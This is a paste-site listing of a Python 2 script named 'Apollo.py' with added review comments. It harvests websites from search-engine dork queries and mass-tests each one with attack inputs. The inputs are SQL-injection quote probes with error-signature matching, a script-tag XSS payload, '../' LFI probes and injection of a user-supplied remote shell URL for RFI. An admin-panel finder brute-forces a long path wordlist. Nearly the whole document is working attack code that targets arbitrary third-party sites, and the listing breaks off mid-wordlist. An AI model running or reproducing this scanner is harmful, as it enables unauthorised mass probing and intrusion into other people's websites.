
Revision: 64323
at July 24, 2013 05:51 by madfedora


#!/usr/bin/env python
"""
      Apollo.py - Python Vulnerability Scanner V1 -
       Written by Sotd - twitter.com/#!/Sotd_

	Modified and fixed by madfedora
	[email protected] 
"""     
import re
import hashlib
import Queue
from random import choice
import threading
import time
import urllib2
import sys
import socket

# Browser and crawler User-Agent strings; the request code picks one at random
# with choice(USER_AGENT) for every outgoing request.
USER_AGENT = [
    "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3",
    "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
    "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
    "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6",
    "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3",
    "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1 rv:2.0; sl-SI) AppleWebKit/533.24.1 (KHTML, like Gecko) Version/4.0.3 Safari/533.24.1",
    "Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/531.13.6 (KHTML, like Gecko) Version/5.0.2 Safari/531.13.6",
    "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.1)",
]
# Scan mode read by Crawl ('1'..'4'); presumably assigned by a menu elsewhere in
# the file, it starts out as a single blank.
option = ' '
# Running tallies that the worker threads bump: confirmed hits, misses and URLs
# without a query string.
vuln, invuln, np = 0, 0, 0
# URLs that answered during an admin-page scan (filled by Atest, read by aprint).
found = []

class Crawl:
    """Collect search-result links for a query and hand them to scanner threads.

    Prompts for the search term ("dork"), a page count and, when the global
    ``option`` is '4', the shell location RScanClass needs.  The constructor
    immediately runs crawler(), which pages through us.ask.com, scrapes the
    result hrefs into a Queue and then starts ten daemon worker threads of the
    class selected by ``option``.
    """
    def __init__(self):
        # Option '4' (RScanClass) is the only mode that needs the extra prompt.
        if option == '4':
            self.shell = str(raw_input('Shell Location: '))
        self.dork = raw_input('Enter your dork: ')
        self.queue = Queue.Queue()
        # Kept as the raw prompt string; int() happens in crawler() and the
        # "Max 80" hint is not enforced anywhere in this class.
        self.pages = raw_input('How many pages (Max 80): ')
        self.qdork = urllib2.quote(self.dork)
        self.page = 1
        # The whole workflow runs from the constructor.
        self.crawler()
   
    def crawler(self):
        """Page through the search engine, scrape result links, then start workers.

        Each results page is fetched with a randomly chosen User-Agent and
        scanned for the '_t" href' / ' onmousedown="return pk' markers that
        frame a result link in the (2013) ask.com markup.  NOTE(review):
        urlopen() is not wrapped in try/except, so any network or HTTP error
        propagates straight out of Crawl() and aborts the run.
        """
        print '\nDorking...'
        for i in range(int(self.pages)):
            host = "http://us.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page)
            req = urllib2.Request(host)
            req.add_header('User-Agent', choice(USER_AGENT))
            response = urllib2.urlopen(req)
            source = response.read()
            start = 0
            count = 1
            end = len(source)
            numlinks = source.count('_t" href', start, end)
 
            # count starts at 1 and the loop runs while count < numlinks, so at
            # most numlinks - 1 links are taken from each page.
            while count < numlinks:
                start = source.find('_t" href', start, end)
                end = source.find(' onmousedown="return pk', start,  end)
                # +10 steps past the 8-character marker plus two more characters
                # (presumably the ="), end-1 drops the closing quote; this
                # assumes the markup layout of the time -- confirm before reuse.
                link = source[start+10:end-1].replace("amp;","")
                self.queue.put(link)
                start = end
                end = len(source)
                count = count + 1 
            self.page += 1

        # Every mode starts ten daemon workers over the same queue and blocks
        # until each queued link has been marked task_done() by a worker.
        if option == '1':
            for i in range(10):
                thread = ScanClass(self.queue)
                thread.setDaemon(True)
                thread.start() 
            self.queue.join()

        elif option == '3':
            for i in range(10):
                thread = LScanClass(self.queue)
                thread.setDaemon(True)
                thread.start() 
            self.queue.join()

        elif option == '2':
            for i in range(10):
                thread = XScanClass(self.queue)
                thread.setDaemon(True)
                thread.start() 
            self.queue.join()

        elif option == '4':
            for i in range(10):
                thread = RScanClass(self.queue, self.shell)
                thread.setDaemon(True)
                thread.start() 
            self.queue.join()

   
class ScanClass(threading.Thread):
    """Worker that probes each queued URL for SQL error messages and logs hits.

    Every URL containing '=' is requested again with a single quote appended
    and the response body is matched, case-insensitively, against a fixed
    list of database error strings.  Matches are appended to sqli-result.txt
    by the per-backend output methods below; everything else is printed as
    "Not Vuln" or "No Parameters".  Runs as a daemon thread; Crawl starts
    ten of them over the same queue.
    """
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue
        # Probe character appended to the URL.
        self.schar = "'"
        # Shared result file; all ten threads append to it without a lock.
        self.file = 'sqli-result.txt'
 
    def run(self):
        """Drain the queue, requesting each URL with the probe character appended.

        NOTE(review): the bare ``except`` below catches every exception
        (KeyboardInterrupt included) and calls task_done(), but task_done() is
        called again at the bottom of the loop, so one failed request is
        counted twice and Queue raises ValueError once its unfinished count
        goes negative.  NOTE(review): vuln/invuln/np are incremented from ten
        threads with no lock; ``+=`` on a global is not atomic in CPython, so
        the totals can drift.
        """
        while True:
            try:
                site = self.queue.get(False)
            except Queue.Empty:
                break
            if '=' in site:
                global vuln
                global invuln
                global np
                test = site + self.schar

                try:
                    conn = urllib2.Request(test)
                    conn.add_header('User-Agent', choice(USER_AGENT))
                    opener = urllib2.build_opener()
                    data = opener.open(conn).read()
                except:
                    self.queue.task_done()
                else:
#===========================================================#
#                                                           #
#      MySQL                                                #
#                                                           #
#===========================================================#
                    # First matching signature wins; each branch records the
                    # probe URL under its backend tag and bumps the counter.
                    if (re.findall("You have an error in your SQL syntax", data, re.I)):
                        self.mysql(test)
                        vuln += 1
                    elif (re.findall('Error:unknown', data, re.I)):
                        self.mysql(test)
                        vuln += 1
                    elif (re.findall('mysql_fetch', data, re.I)):
                        self.mysql(test)
                        vuln += 1
		    elif (re.findall('mysql_numrows', data, re.I)):
                        self.mysql(test)
                        vuln += 1
		    elif (re.findall('mysql_num', data, re.I)):
                        self.mysql(test)
                        vuln += 1
		    elif (re.findall('Invalid Query', data, re.I)):
                        self.mysql(test)
                        vuln += 1
		    elif (re.findall('FetchRow', data, re.I)):
                        self.mysql(test)
                        vuln += 1
		    elif (re.findall('GetArray', data, re.I)):
                        self.mysql(test)
                        vuln += 1
		    elif (re.findall('SELECT statements have a different number of columns', data, re.I)):
                        self.mysql(test)
                        vuln += 1
		    elif (re.findall('\' doesn\'t exist', data, re.I)):
                        self.mysql(test)
                        vuln += 1
		    elif (re.findall('Unexpected EOF found when reading file', data, re.I)):
                        self.mysql(test)
                        vuln += 1
		    elif (re.findall('Triggers can not be created on system tables', data, re.I)):
                        self.mysql(test)
                        vuln += 1
#===========================================================#
#                                                           #
#      MsSQL                                                #
#                                                           #
#===========================================================#
                    elif (re.findall('OLE DB Provider for SQL Server', data, re.I)):
                        self.mssql(test)
                        vuln += 1
		    elif (re.findall('Unclosed quotation mark before the character string', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('All queries in a SQL statement containing a UNION', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('Syntax error converting the varchar value', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('syntax near the keyword \'', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('String or binary data would be truncated', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('Invalid object name \'', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('Incorrect syntax near', data, re.I)):
                        self.mssql(test)
                        vuln += 1
#===========================================================#
#                                                           #
#      Oracle                                               #
#                                                           #
#===========================================================#
                    elif (re.findall('oracle.jdbc.', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('java.sql.sqlexception', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('SQL command not properly ended', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('quoted string not properly terminated', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('wrong number or types of arguments in call to', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('query block has incorrect number of result columns', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('expression must have same datatype as correspoding expression', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('ORA-01722:', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('a non-numeric character was found where a numeric was expected', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('FROM keyword not found where expected', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('ORA-00936:', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('ORA-00972:', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('table or view does not exist', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('Invalid relational operator', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('missing right parenthesis', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('ORA-00900:', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('ORA-03001:', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('can only select from fixed tables/views', data, re.I)):
                        self.oracle(test)
                        vuln += 1
#===========================================================#
#                                                           #
#      OLE DB                                               #
#                                                           #
#===========================================================#
                    elif (re.findall('system.data.oledb', data, re.I)):
                        self.ole(test)
                        vuln += 1
                    elif (re.findall('Microsoft OLE DB Provider for', data, re.I)):
                        self.ole(test)
                        vuln += 1
#===========================================================#
#                                                           #
#      ODBC                                                 #
#                                                           #
#===========================================================#
                    elif (re.findall('ODBC Microsoft Access Driver', data, re.I)):
                        self.odbc(test)
                        vuln += 1
                    elif (re.findall('ODBC Microsoft Server Driver', data, re.I)):
                        self.odbc(test)
                        vuln += 1
#===========================================================#
#                                                           #
#      JET DB                                               #
#                                                           #
#===========================================================#
                    elif (re.findall('JET Database Engine', data, re.I)):
                        self.jet(test)
                        vuln += 1
#===========================================================#
#                                                           #
#      ADO DB                                               #
#                                                           #
#===========================================================#
                    elif (re.findall('ADODB.Field', data, re.I)):
                        self.ado(test)
                        vuln += 1
                    elif (re.findall('ADODB.Command', data, re.I)):
                        self.ado(test)
                        vuln += 1
                    elif (re.findall('BOF or EOF', data, re.I)):
                        self.ado(test)
                        vuln += 1
#===========================================================#
#                                                           #
#      PostgreSQL                                           #
#                                                           #
#===========================================================#
                    # NOTE(review): these branches call self.pgsql(), but the
                    # output method defined below is named psql(), so a
                    # PostgreSQL match raises AttributeError and kills the
                    # thread before task_done() is reached.
                    elif (re.findall('postgresql.util', data, re.I)):
                        self.pgsql(test)
                        vuln += 1
                    elif (re.findall('ERROR: invalid input syntax for integer', data, re.I)):
                        self.pgsql(test)
                        vuln += 1
                    elif (re.findall('null_value_eliminated_in_set_function', data, re.I)):
                        self.pgsql(test)
                        vuln += 1
                    elif (re.findall('dynamic_result_sets_returned', data, re.I)):
                        self.pgsql(test)
                        vuln += 1
                    elif (re.findall(': FATAL', data, re.I)):
                        self.pgsql(test)
                        vuln += 1
                    elif (re.findall(': could not connect to server', data, re.I)):
                        self.pgsql(test)
                        vuln += 1
#===========================================================#
#                                                           #
#      Sybase                                               #
#                                                           #
#===========================================================#
                    elif (re.findall('Warning: sybase_query()', data, re.I)):
                        self.sybase(test)
                        vuln += 1
                    elif (re.findall('sybase_fetch_assoc()', data, re.I)):
                        self.sybase(test)
                        vuln += 1
#===========================================================#
#                                                           #
#      Misc                                                 #
#                                                           #
#===========================================================#
                    elif (re.findall('query failed:', data, re.I)):
                        self.misc(test)
                        vuln += 1
                    else:
                        # B, W, R, G, O are not defined in this listing;
                        # presumably ANSI colour prefixes set elsewhere in the file.
                        print B+test+W+' <-- Not Vuln'
                        invuln += 1
            else:
                print R+site+W+' <-- No Parameters'
                np += 1
            self.queue.task_done()


    def mysql(self, url):
        """Append url to the result file tagged [MySQL] unless it is already listed.

        NOTE(review): the handle opened for the duplicate check is never
        closed explicitly, the check is a plain substring test over the whole
        file, and whether read() right after an "a+" open returns the existing
        contents is platform-dependent in Python 2 -- confirm on the target
        platform.  Appends from the ten worker threads are not serialised.
        """
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] '+W+url
        else:
            print O+"[MySQL] " + url+W
            write = open(self.file, "a+")
            write.write('[MySQL] ' + url + "\n")
            write.close()

    def mssql(self, url):
        """Append url tagged [MsSQL]; same duplicate check and caveats as mysql()."""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[MsSQL] " + url+W
	    write = open (self.file, "a+")
            write.write('[MsSQL] ' + url + "\n")
            write.close()   

    def oracle(self, url):
        """Append url tagged [Oracle]; same duplicate check and caveats as mysql()."""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[Oracle] " + url+W
	    write = open (self.file, "a+")
            write.write('[Oracle] ' + url + "\n")
            write.close()

    def ole(self, url):
        """Append url tagged [OLE DB]; same duplicate check and caveats as mysql()."""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[OLE DB] " + url+W
	    write = open (self.file, "a+")
            write.write('[OLE DB] ' + url + "\n")
            write.close()

    def odbc(self, url):
        """Append url tagged [ODBC]; same duplicate check and caveats as mysql()."""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[ODBC] " + url+W
	    write = open (self.file, "a+")
            write.write('[ODBC] ' + url + "\n")
            write.close()

    def jet(self, url):
        """Append url tagged [JET DB]; same duplicate check and caveats as mysql()."""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[JET DB] " + url+W
	    write = open (self.file, "a+")
            write.write('[JET DB] ' + url + "\n")
            write.close()

    def ado(self, url):
        """Append url tagged [ADO]; same duplicate check and caveats as mysql()."""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[ADO] " + url+W
	    write = open (self.file, "a+")
            write.write('[ADO] ' + url + "\n")
            write.close()

    def psql(self, url):
        """Append url tagged [PGSQL]; same duplicate check and caveats as mysql().

        NOTE(review): run() calls this method as self.pgsql(), so as written it
        is never reached.
        """
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[PGSQL] " + url+W
	    write = open (self.file, "a+")
            write.write('[PGSQL] ' + url + "\n")
            write.close()

    def sybase(self, url):
        """Append url tagged [SYBASE]; same duplicate check and caveats as mysql()."""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[SYBASE] " + url+W
	    write = open (self.file, "a+")
            write.write('[SYBASE] ' + url + "\n")
            write.close()

    def misc(self, url):
        """Append url tagged [Misc]; same duplicate check and caveats as mysql()."""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[Misc] " + url+W
	    write = open (self.file, "a+")
            write.write('[Misc] ' + url + "\n")
            write.close()

class LScanClass(threading.Thread):
    """Worker that probes each queued URL for local file inclusion errors.

    The value of the last query parameter is replaced by '../' and the
    response is searched for PHP's "failed to open stream" message; hits are
    appended to lfi-result.txt.  Daemon thread; Crawl starts ten of them.
    """
    def __init__(self, queue):
        threading.Thread.__init__(self)
        # Shared result file; threads append to it without a lock.
        self.file = 'lfi-result.txt'
        self.queue = queue
        # Probe value substituted for the last query parameter.
        self.lchar = '../' 
       
    def run(self):
        """Drain the queue, rewriting the last parameter of each URL and requesting it.

        NOTE(review): same accounting defects as ScanClass.run -- the bare
        ``except`` calls task_done() and the loop end calls it again, and the
        global counters are updated from ten threads without a lock.
        """
        while True:
            try:
                site = self.queue.get(False)
            except Queue.Empty:
                break
            if '=' in site:
                # rsplit drops the last '=' together with its value, so lsite
                # ends with '=' only when the URL had two '=' in a row.
                lsite = site.rsplit('=', 1)[0]
                if lsite[-1] != "=":
                    lsite = lsite + "="
                test = lsite + self.lchar
                global vuln
                global invuln
                global np

                try:
                    conn = urllib2.Request(test)
                    conn.add_header('User-Agent', choice(USER_AGENT))
                    opener = urllib2.build_opener()
                    data = opener.open(conn).read()

                except:
                    self.queue.task_done()

                else:
                    if (re.findall("failed to open stream: No such file or directory", data, re.I)):
                        self.lfi(test)
                        vuln += 1
                    else:
                        # B, W, R, G, O are not defined in this listing;
                        # presumably ANSI colour prefixes set elsewhere in the file.
                        print B+test+W+' <-- Not Vuln'
                        invuln += 1
            else:
                print R+site+W+' <-- No Parameters' 
                np += 1  
            self.queue.task_done()


    def lfi(self, url):
        """Append url tagged [LFI] unless already listed.

        NOTE(review): the duplicate check opens the file in "a+" mode and reads
        it without closing the handle; whether it sees existing contents is
        platform-dependent in Python 2 -- confirm on the target platform.
        """
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[LFI] " + url+W
            write = open(self.file, "a+")
            write.write('[LFI] ' + url + "\n")
            write.close()      


class XScanClass(threading.Thread):
    """Worker that checks each queued URL for reflection of a marker string.

    The value of the last query parameter is replaced by a URL-encoded script
    tag carrying the marker "4p0ll0"; a URL is reported when that marker comes
    back anywhere in the response body.  This is a reflection check only -- a
    hit means the input was echoed, not that it was rendered unescaped, so
    results need manual confirmation.  Hits go to xss-result.txt.
    """
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue
        # Probe value; the search below only looks for its "4p0ll0" marker.
        self.xchar = """%3CScRIpT%3Ealert(%224p0ll0%22)%3C%2FScRiPt%3E"""
        # Shared result file; threads append to it without a lock.
        self.file = 'xss-result.txt'
 
    def run(self):
        """Drain the queue, rewriting the last parameter of each URL and requesting it.

        NOTE(review): same accounting defects as ScanClass.run -- the bare
        ``except`` calls task_done() and the loop end calls it again, and the
        global counters are updated from ten threads without a lock.
        """
        while True:
            try:
                site = self.queue.get(False)
            except Queue.Empty:
                break
            if '=' in site:
                global vuln
                global invuln
                global np
                # rsplit drops the last '=' together with its value, so xsite
                # ends with '=' only when the URL had two '=' in a row.
                xsite = site.rsplit('=', 1)[0]
                if xsite[-1] != "=":
                    xsite = xsite + "="
                test = xsite + self.xchar
                try:
                    conn = urllib2.Request(test)
                    conn.add_header('User-Agent', choice(USER_AGENT))
                    opener = urllib2.build_opener()
                    data = opener.open(conn).read()
                except:
                    self.queue.task_done()
                else:
                    # Case-insensitive substring match of the marker only.
                    if (re.findall("4p0ll0", data, re.I)):
                        self.xss(test)
                        vuln += 1
                    else:
                        # B, W, R, G, O are not defined in this listing;
                        # presumably ANSI colour prefixes set elsewhere in the file.
                        print B+test+W+' <-- Not Vuln'
                        invuln += 1
            else:
                print R+site+W+' <-- No Parameters'
                np += 1
            self.queue.task_done()
 
    def xss(self, url):
        """Append url tagged [XSS] unless already listed.

        NOTE(review): the duplicate check opens the file in "a+" mode and reads
        it without closing the handle; whether it sees existing contents is
        platform-dependent in Python 2 -- confirm on the target platform.
        """
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[XSS] " + url+W
            write = open(self.file, "a+")
            write.write('[XSS] ' + url + "\n")
            write.close()   


class RScanClass(threading.Thread):
    """Worker that checks each queued URL for remote file inclusion.

    The value of the last query parameter is replaced by the shell location
    entered in Crawl.__init__ (plus a trailing '?') and the response is
    searched for the string 'uname -a'.  Hits go to rfi-result.txt.  Daemon
    thread; Crawl starts ten of them.
    """
    def __init__(self, queue, shell):
        threading.Thread.__init__(self)
        self.queue = queue
        # Shared result file; threads append to it without a lock.
        self.file = 'rfi-result.txt'
        # Location string supplied interactively; used verbatim, unvalidated.
        self.shell = shell
 
    def run(self):
        """Drain the queue, rewriting the last parameter of each URL and requesting it.

        NOTE(review): same accounting defects as ScanClass.run -- the bare
        ``except`` calls task_done() and the loop end calls it again, and the
        global counters are updated from ten threads without a lock.
        """
        while True:
            try:
                site = self.queue.get(False)
            except Queue.Empty:
                break
            if '=' in site:
                global vuln
                global invuln
                global np
                # rsplit drops the last '=' together with its value, so rsite
                # ends with '=' only when the URL had two '=' in a row.
                rsite = site.rsplit('=', 1)[0]
                if rsite[-1] != "=":
                    rsite = rsite + "="
                link = rsite + self.shell + '?'
                try:
                    conn = urllib2.Request(link)
                    conn.add_header('User-Agent', choice(USER_AGENT))
                    opener = urllib2.build_opener()
                    data = opener.open(conn).read()
                except:
                    self.queue.task_done()
                else:
                    # Substring match; any page that merely echoes the string
                    # is reported too.
                    if (re.findall('uname -a', data, re.I)):
                        self.rfi(link)
                        vuln += 1
                    else:
                        # B, W, R, G, O are not defined in this listing;
                        # presumably ANSI colour prefixes set elsewhere in the file.
                        print B+link+W+' <-- Not Vuln'
                        invuln += 1
            else:
                print R+site+W+' <-- No Parameters'
                np += 1        
            self.queue.task_done()
   
    def rfi(self, url):
        """Append url tagged [RFI] unless already listed.

        NOTE(review): the duplicate check opens the file in "a+" mode and reads
        it without closing the handle; whether it sees existing contents is
        platform-dependent in Python 2 -- confirm on the target platform.
        """
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[RFI] " + url+W
            write = open(self.file, "a+")
            write.write('[RFI] ' + url + "\n")
            write.close()       

 
class Atest(threading.Thread):
    """Worker that requests each queued URL and records the ones that answer.

    Used by admin(); twenty of these drain a queue of candidate paths and
    append every URL that opens without error to the global ``found`` list.
    """
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue
 
    def run(self):
        """Treat any non-error HTTP response as a found page.

        Only urllib2.URLError (which includes HTTPError) is handled.
        NOTE(review): any other exception escapes run(), the thread dies
        without calling task_done(), and queue.join() in admin() never
        returns.  Servers that answer 200 for unknown paths will be reported
        for every candidate, so results need manual review.
        """
        while True:
            try:
                site = self.queue.get(False)

            except Queue.Empty:
                break
            try:
                conn = urllib2.Request(site)
                conn.add_header('User-Agent', choice(USER_AGENT))
                opener = urllib2.build_opener()
                opener.open(conn)
                print site
                # Module-level list shared by all twenty threads.
                found.append(site)
                self.queue.task_done()
   
            except urllib2.URLError:
                self.queue.task_done()


def admin():
    """Create queue and threads for admin page scans.

    Prompts for a base URL, queues base + candidate for every entry of the
    fixed ``dirs`` wordlist and runs twenty Atest workers until the queue is
    drained.  The base URL is concatenated as typed; the "ending /" asked for
    in the prompt is not checked or added.  NOTE(review): the wordlist
    contains repeated entries (e.g. 'admin/account.php'), each of which is
    requested again.  NOTE(review): as shown in this listing the literal is
    broken across a line break inside two string elements ('moderator/login.html'
    and 'Indy_admin/'), which does not parse -- presumably a wrapping artefact
    of the paste rather than the original source.
    """
    print 'Need to include http:// and ending /\n'
    site = raw_input('Site: ')
    queue  = Queue.Queue()
    dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/', 
            'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php', 
            'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html', 
            'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php', 
            'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp', 
            'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html', 
            'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php',
            'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html',
            'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html',
            'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html',
            'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html',
            'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html',
            'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html',
            'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html',
            'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html',
            'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php',
            'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php',
            'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php',
            'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php','admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html
','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_ad
